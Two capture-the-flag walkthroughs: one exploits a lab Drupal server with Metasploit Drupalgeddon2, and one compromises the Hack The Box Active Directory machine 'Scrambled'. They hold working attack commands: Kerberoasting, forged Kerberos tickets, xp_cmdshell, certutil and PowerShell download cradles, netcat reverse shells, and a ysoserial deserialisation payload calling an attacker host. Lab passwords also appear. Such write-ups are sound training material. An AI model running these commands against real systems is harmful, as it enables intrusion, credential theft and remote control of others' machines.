ptd-chilakiller

┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap 
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest: 
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|--snipp--
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]

┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run

[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200

ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >

cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!-- FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 -->
</body>

</html>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* 'password' => 'password',
* username, password, host, and database name.
* 'password' => 'password',
* 'password' => 'password',
* 'password' => 'password',
* 'password' => 'password',
'password' => 'EstaContraNoesTanImp0rtant3!!!',
* by using the username and password variables. The proxy_user_agent variable
# $conf['proxy_password'] = '';
www-data@chilakiller:/var/www/html/restaurante/sites/default$

www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
| uid | name          | pass                                                    | mail                  | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init                  | data |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
|   0 |               |                                                         |                       |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                       | NULL |
|   1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local |       |           | NULL             | 1596317328 | 1643552710 | 1643551677 |      1 | America/Mexico_City |          |       0 | chilakiller@ptd.local | b:0; |
+-----+---------------+---------------------------------------------------------+-----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-----------------------+------+
2 rows in set (0.00 sec)

MariaDB [drupaldb]>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1

user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$

user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$

su root
pw = ChilaKill3s_Tru3_L0v3R

root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762

root@chilakiller:/var/www/html/restaurante# find / -name "FLAG1.txt"
find / -name "FLAG1.txt"
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
<rante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#

root@chilakiller:/var/www/html/restaurante# hostnamectl
hostnamectl
Static hostname: chilakiller
Icon name: computer-vm
Chassis: vm
Machine ID: c8677bebac964d43bed5ebe1af1caaa6
Boot ID: 907f69a447f04a8782bde75417cec04a
Virtualization: vmware
Operating System: Debian GNU/Linux 9 (stretch)
Kernel: Linux 4.9.0-13-amd64
Architecture: x86-64
root@chilakiller:/var/www/html/restaurante#

Author : Puckiestyle

htb-scrambled-nl

Scrambled

Scanning

> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp  open  found?        syn-ack ttl 127
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49552/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

There are many open ports; this looks like an Active Directory domain controller, with LDAP and Kerberos enabled, so we need to enumerate several services in turn.

Found several domain names that might be useful later.

scrm.local
DC1.scrm.local
scramblecorp.com

Web Enum

Web enum found something interesting: http://scrm.local/support.html

04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues 

On http://scrm.local/supportrequest.html there is also a username visible in the screenshot: ksimpson.

http://scrm.local/salesorders.html shows a client application used by this organisation. Later we will find the matching server running on port 4411.

If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following: 

A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem 

Directory enum didn’t find anything useful

> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 -  148B  - /assets  ->  http://scrm.local/assets/
[19:50:40] 301 -  148B  - /images  ->  http://scrm.local/images/
[19:50:41] 200 -    2KB - /index.html
[19:51:07] 200 -    2KB - /passwords.html
[19:51:41] 200 -    2KB - /support.html

Further page enum didn't find anything interesting

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"

Subdomain enum didn’t find anything useful

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"

So, this target may not have much to do with web vectors.

Host Enum

Host enum didn't find anything useful

> enum4linux 10.10.11.168

Port 4411 Enum

Use nc to connect to the non-conventional port 4411. There seems to be a server application running here, but we cannot yet confirm which application it is.

> nc -vn 10.10.11.168 4411

LDAP Enum

Perform LDAP enum using the ldap3 Python module

Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info

DSA info (from DSE):
  Supported LDAP versions: 3, 2
  Naming contexts: 
    DC=scrm,DC=local
    CN=Configuration,DC=scrm,DC=local
    CN=Schema,CN=Configuration,DC=scrm,DC=local
    DC=DomainDnsZones,DC=scrm,DC=local
    DC=ForestDnsZones,DC=scrm,DC=local

An nmap scan with the ldap scripts confirms the above results

> nmap -n -sV --script "ldap* and not brute" 10.10.11.168

Overall, nothing useful at this stage

Kerberos Enum

Perform username enum

> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt

2022/06/15 20:03:16 >  [+] VALID USERNAME:       administrator@scrm.local
2022/06/15 20:04:30 >  [+] VALID USERNAME:       asmith@scrm.local
2022/06/15 20:06:16 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/06/15 20:07:39 >  [+] VALID USERNAME:       jhall@scrm.local
2022/06/15 20:16:59 >  [+] VALID USERNAME:       sjenkins@scrm.local
2022/06/15 20:18:19 >  [+] VALID USERNAME:       khicks@scrm.local
2022/06/15 20:30:25 >  [+] VALID USERNAME:       Asmith@scrm.local
2022/06/15 20:48:39 >  [+] VALID USERNAME:       ASMITH@scrm.local

We also know from the earlier screenshot that there may be a user called ksimpson, which we can confirm here. This user also happens to use a password that is the same as the username.

> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

This user can be used to obtain a TGT with getTGT.py. Note: you may encounter an error when running the getTGT.py script; fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206

> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request

Save the ticket to a file mssql.kirbi and crack using john

> john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssql.kirbi

The credential for sqlsvc is cracked.

We now have a service principal credential, sqlsvc:Pegasus60

Foothold

Via golden ticket impersonation we can gain a foothold as the service principal; for background refer to: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

To do so, we need the ntlm hash of a valid account password and the domain SID

Get the domain SID using windapsearch; set up go-windapsearch from https://github.com/ropnop/windapsearch

> ./windapsearch -d 10.10.11.168 -u sqlsvc@scrm.local -p 'Pegasus60' --secure -j -m computers --full

Generate the NTLM hash for the password `Pegasus60` using https://codebeautify.org/ntlm-hash-generator (note that this sends the credential to a third-party site); this gives b999a16500b87d17ec7f2e2a68778f05

Impersonate Administrator; its user ID (RID) is 500 by convention. Read about how Microsoft manages RIDs for more background.

> ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local
> export KRB5CCNAME=Administrator.ccache

Connect to mssql via the impersonated ticket

> mssqlclient.py dc1.scrm.local -k

Enable cmdshell

> enable_xp_cmdshell
> xp_cmdshell("whoami")

Upload nc.exe and create a reverse shell. We need to locate a folder the current account can write to.

> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe

Upload SharpHound.exe (I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe), run it, and transfer the results back to Kali for analysis

> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

BloodHound analysis shows a user tstar in the IT group, which has the CanPSRemote right. However, after some trial and error this proved useless.

PE

Upload winpeas

> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe

# found something interesting from WinPEAS
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected

[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)

There is a PDF document in C:\Shares\Public saying that HR has a database, which may contain user passwords

Check db for user passwords

> sqlcmd -q "select name from sys.databases"

Check tables in ScrambleHR

> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"

# found
Employees
UserImport
Timesheets

Check the content of the UserImport table; it contains the user MiscSvc with an LDAP credential

> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"

MiscSvc is an IT user, which means it has the CanPSRemote permission, but evil-winrm doesn't work.

Alternatively, use a PowerShell reverse shell to log in

> $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword)
> Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') } -Credential $Cred

# on kali
> rlwrap netcat -lvnp 6666

Receive reverse shell as miscsvc and catch the user flag

From the previous enum, there is a server app running from C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe

Checking which user runs the process returns N/A, so the process is probably run by an account with higher privileges.

> tasklist /v

However, we can access c:\shares\it, which holds a copy of the Sales Order client application and a DLL file.

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe

Reverse Eng

strings shows what look like operation codes

> strings ScrambleLib.dll

Set up ILSpy and decompile the DLL, https://github.com/icsharpcode/ILSpy

> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll

Read the decompiled code to understand how the commands work. The payloads are .NET serialised objects.

Use ysoserial to exploit the .NET deserialisation vulnerability; this needs to run on Windows, https://github.com/pwntester/ysoserial.net

> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Run a nc listener and upload the payload

> nc 10.10.16.3 4411
> UPLOAD_ORDER;[base64 payload from the previous step, removed here]

Get the reverse shell and catch the root flag

rooted